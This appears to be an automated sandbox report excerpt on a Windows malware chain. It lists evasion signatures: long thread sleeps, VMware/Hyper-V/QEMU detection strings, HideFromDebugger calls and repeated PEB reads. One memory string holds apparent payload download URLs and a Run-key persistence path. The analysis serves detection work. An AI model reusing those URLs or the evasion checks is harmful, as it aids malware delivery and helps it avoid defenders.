      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3427Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 862Jump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 5.9 %
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dllJump to dropped file
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC86A60 rdtscp 23_2_1EC86A60
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000004.00000003.527285571.0000000005E1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
      Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRT
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: explorer.exe, 00000018.00000000.692920243.000000000640C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000018.00000000.692920243.000000000640C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: wscript.exe, 00000001.00000003.360714915.0000020FF7DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\A
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: powershell.exe, 00000004.00000002.670508477.0000000005B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82ACB mov eax, dword ptr fs:[00000030h]23_2_1EC82ACB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28ED6 mov eax, dword ptr fs:[00000030h]23_2_1ED28ED6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC836CC mov eax, dword ptr fs:[00000030h]23_2_1EC836CC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC98EC7 mov eax, dword ptr fs:[00000030h]23_2_1EC98EC7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED0FEC0 mov eax, dword ptr fs:[00000030h]23_2_1ED0FEC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC676E2 mov eax, dword ptr fs:[00000030h]23_2_1EC676E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC816E0 mov ecx, dword ptr fs:[00000030h]23_2_1EC816E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82AE4 mov eax, dword ptr fs:[00000030h]23_2_1EC82AE4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEFE87 mov eax, dword ptr fs:[00000030h]23_2_1ECEFE87
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8D294 mov eax, dword ptr fs:[00000030h]23_2_1EC8D294
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8D294 mov eax, dword ptr fs:[00000030h]23_2_1EC8D294
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h]23_2_1EC552A5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h]23_2_1EC552A5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h]23_2_1EC552A5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h]23_2_1EC552A5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h]23_2_1EC552A5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD46A7 mov eax, dword ptr fs:[00000030h]23_2_1ECD46A7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6AAB0 mov eax, dword ptr fs:[00000030h]23_2_1EC6AAB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6AAB0 mov eax, dword ptr fs:[00000030h]23_2_1EC6AAB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED20EA5 mov eax, dword ptr fs:[00000030h]23_2_1ED20EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED20EA5 mov eax, dword ptr fs:[00000030h]23_2_1ED20EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED20EA5 mov eax, dword ptr fs:[00000030h]23_2_1ED20EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8FAB0 mov eax, dword ptr fs:[00000030h]23_2_1EC8FAB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59240 mov eax, dword ptr fs:[00000030h]23_2_1EC59240
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59240 mov eax, dword ptr fs:[00000030h]23_2_1EC59240
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59240 mov eax, dword ptr fs:[00000030h]23_2_1EC59240
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59240 mov eax, dword ptr fs:[00000030h]23_2_1EC59240
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h]23_2_1EC67E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECE4257 mov eax, dword ptr fs:[00000030h]23_2_1ECE4257
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6766D mov eax, dword ptr fs:[00000030h]23_2_1EC6766D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED0B260 mov eax, dword ptr fs:[00000030h]23_2_1ED0B260
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED0B260 mov eax, dword ptr fs:[00000030h]23_2_1ED0B260
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28A62 mov eax, dword ptr fs:[00000030h]23_2_1ED28A62
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9927A mov eax, dword ptr fs:[00000030h]23_2_1EC9927A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h]23_2_1EC7AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h]23_2_1EC7AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h]23_2_1EC7AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h]23_2_1EC7AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h]23_2_1EC7AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5C600 mov eax, dword ptr fs:[00000030h]23_2_1EC5C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5C600 mov eax, dword ptr fs:[00000030h]23_2_1EC5C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5C600 mov eax, dword ptr fs:[00000030h]23_2_1EC5C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC88E00 mov eax, dword ptr fs:[00000030h]23_2_1EC88E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC68A0A mov eax, dword ptr fs:[00000030h]23_2_1EC68A0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5AA16 mov eax, dword ptr fs:[00000030h]23_2_1EC5AA16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5AA16 mov eax, dword ptr fs:[00000030h]23_2_1EC5AA16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A61C mov eax, dword ptr fs:[00000030h]23_2_1EC8A61C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A61C mov eax, dword ptr fs:[00000030h]23_2_1EC8A61C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC55210 mov eax, dword ptr fs:[00000030h]23_2_1EC55210
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC55210 mov ecx, dword ptr fs:[00000030h]23_2_1EC55210
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC55210 mov eax, dword ptr fs:[00000030h]23_2_1EC55210
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC55210 mov eax, dword ptr fs:[00000030h]23_2_1EC55210
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED11608 mov eax, dword ptr fs:[00000030h]23_2_1ED11608
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC73A1C mov eax, dword ptr fs:[00000030h]23_2_1EC73A1C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5E620 mov eax, dword ptr fs:[00000030h]23_2_1EC5E620
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC94A2C mov eax, dword ptr fs:[00000030h]23_2_1EC94A2C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC94A2C mov eax, dword ptr fs:[00000030h]23_2_1EC94A2C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED0FE3F mov eax, dword ptr fs:[00000030h]23_2_1ED0FE3F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD53CA mov eax, dword ptr fs:[00000030h]23_2_1ECD53CA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD53CA mov eax, dword ptr fs:[00000030h]23_2_1ECD53CA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h]23_2_1EC803E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7DBE9 mov eax, dword ptr fs:[00000030h]23_2_1EC7DBE9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC937F5 mov eax, dword ptr fs:[00000030h]23_2_1EC937F5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC61B8F mov eax, dword ptr fs:[00000030h]23_2_1EC61B8F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC61B8F mov eax, dword ptr fs:[00000030h]23_2_1EC61B8F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED0D380 mov ecx, dword ptr fs:[00000030h]23_2_1ED0D380
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC68794 mov eax, dword ptr fs:[00000030h]23_2_1EC68794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8B390 mov eax, dword ptr fs:[00000030h]23_2_1EC8B390
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h]23_2_1ECD7794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h]23_2_1ECD7794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h]23_2_1ECD7794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED1138A mov eax, dword ptr fs:[00000030h]23_2_1ED1138A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC82397 mov eax, dword ptr fs:[00000030h]23_2_1EC82397
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h]23_2_1EC84BAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h]23_2_1EC84BAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h]23_2_1EC84BAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED25BA5 mov eax, dword ptr fs:[00000030h]23_2_1ED25BA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5DB40 mov eax, dword ptr fs:[00000030h]23_2_1EC5DB40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6EF40 mov eax, dword ptr fs:[00000030h]23_2_1EC6EF40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28B58 mov eax, dword ptr fs:[00000030h]23_2_1ED28B58
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5F358 mov eax, dword ptr fs:[00000030h]23_2_1EC5F358
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5DB60 mov ecx, dword ptr fs:[00000030h]23_2_1EC5DB60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6FF60 mov eax, dword ptr fs:[00000030h]23_2_1EC6FF60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC83B7A mov eax, dword ptr fs:[00000030h]23_2_1EC83B7A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC83B7A mov eax, dword ptr fs:[00000030h]23_2_1EC83B7A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28F6A mov eax, dword ptr fs:[00000030h]23_2_1ED28F6A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A70E mov eax, dword ptr fs:[00000030h]23_2_1EC8A70E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A70E mov eax, dword ptr fs:[00000030h]23_2_1EC8A70E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED1131B mov eax, dword ptr fs:[00000030h]23_2_1ED1131B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7F716 mov eax, dword ptr fs:[00000030h]23_2_1EC7F716
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEFF10 mov eax, dword ptr fs:[00000030h]23_2_1ECEFF10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEFF10 mov eax, dword ptr fs:[00000030h]23_2_1ECEFF10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED2070D mov eax, dword ptr fs:[00000030h]23_2_1ED2070D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED2070D mov eax, dword ptr fs:[00000030h]23_2_1ED2070D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC54F2E mov eax, dword ptr fs:[00000030h]23_2_1EC54F2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC54F2E mov eax, dword ptr fs:[00000030h]23_2_1EC54F2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8E730 mov eax, dword ptr fs:[00000030h]23_2_1EC8E730
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED28CD6 mov eax, dword ptr fs:[00000030h]23_2_1ED28CD6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov eax, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov ecx, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov eax, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov eax, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov eax, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEB8D0 mov eax, dword ptr fs:[00000030h]23_2_1ECEB8D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC558EC mov eax, dword ptr fs:[00000030h]23_2_1EC558EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED114FB mov eax, dword ptr fs:[00000030h]23_2_1ED114FB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6CF0 mov eax, dword ptr fs:[00000030h]23_2_1ECD6CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6CF0 mov eax, dword ptr fs:[00000030h]23_2_1ECD6CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD6CF0 mov eax, dword ptr fs:[00000030h]23_2_1ECD6CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC59080 mov eax, dword ptr fs:[00000030h]23_2_1EC59080
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD3884 mov eax, dword ptr fs:[00000030h]23_2_1ECD3884
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECD3884 mov eax, dword ptr fs:[00000030h]23_2_1ECD3884
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6849B mov eax, dword ptr fs:[00000030h]23_2_1EC6849B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC990AF mov eax, dword ptr fs:[00000030h]23_2_1EC990AF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A0 mov eax, dword ptr fs:[00000030h]23_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8F0BF mov ecx, dword ptr fs:[00000030h]23_2_1EC8F0BF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8F0BF mov eax, dword ptr fs:[00000030h]23_2_1EC8F0BF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8F0BF mov eax, dword ptr fs:[00000030h]23_2_1EC8F0BF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8A44B mov eax, dword ptr fs:[00000030h]23_2_1EC8A44B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC70050 mov eax, dword ptr fs:[00000030h]23_2_1EC70050
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC70050 mov eax, dword ptr fs:[00000030h]23_2_1EC70050
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEC450 mov eax, dword ptr fs:[00000030h]23_2_1ECEC450
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECEC450 mov eax, dword ptr fs:[00000030h]23_2_1ECEC450
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED12073 mov eax, dword ptr fs:[00000030h]23_2_1ED12073
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED21074 mov eax, dword ptr fs:[00000030h]23_2_1ED21074
